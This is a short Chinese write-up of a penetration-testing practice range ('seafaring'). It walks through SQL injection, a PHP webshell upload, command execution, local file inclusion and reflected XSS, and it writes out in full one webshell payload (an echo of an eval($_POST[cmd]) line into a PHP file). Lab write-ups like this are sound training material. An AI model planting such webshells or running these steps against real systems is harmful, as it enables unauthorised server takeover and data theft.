seafaring靶场渗透测试

1.sql注入漏洞

进来这里有个框

尝试xss没有那咱们就来试试搜索行注入

这里有东西说明闭合成功,接着就order by 有三列

三个地方都有回显

查看数据库

这里查表发现只有两个

先去看看admin先来看看列

然后看用户密码,这里密码直接显示出来了

2.文件上传漏洞

拿去登录看看里边有个上传文件的地方上传一个一句话木马上去

可以上传php

拿它给的地址去访问,成功访问到

拿去蚁剑连接成功

3.命令执行漏洞

下边有个框里边有个ls这里我直接点了个执行

结果就可以看到文件

输入whoami能显示

直接写入一句话木马 echo '<?php phpinfo();@eval($_POST[cmd]);?>' > sxy.php

然后访问

再拿去连接

4.文件包含漏洞

点关于弹出来about.php?file=header.php说明存在文件包含我们上边可以通过写入的phpinfo看到远程文件包含关闭

那只能用本地文件包含了,这里通过读取上边写入的木马文件来访问

这里上边连过了就不连了

5.xss反射型

来到登录页面两个框

先试上边的成功回显弹窗

相关推荐
网安-轩逸11 分钟前
网络安全、Web安全、渗透测试之笔经面经总结
安全·web安全
follycat17 分钟前
信息收集--CDN绕过
网络·安全·网络安全
黑客Ela44 分钟前
网络安全问题概述
安全·web安全·php
思通数科多模态大模型2 小时前
10大核心应用场景,解锁AI检测系统的智能安全之道
人工智能·深度学习·安全·目标检测·计算机视觉·自然语言处理·数据挖掘
思通数科AI全行业智能NLP系统3 小时前
六大核心应用场景,解锁AI检测系统的智能安全之道
图像处理·人工智能·深度学习·安全·目标检测·计算机视觉·知识图谱
网络安全(king)4 小时前
【Python】【持续项目】Python-安全项目搜集
开发语言·python·安全
go_to_hacker7 小时前
容器安全检测和渗透测试工具
测试工具·安全
澜世7 小时前
2024小迪安全基础入门第二课
网络·笔记·安全
Donvink9 小时前
大模型安全和越狱攻击——《动手学大模型》实践教程第五章
深度学习·安全·语言模型·llama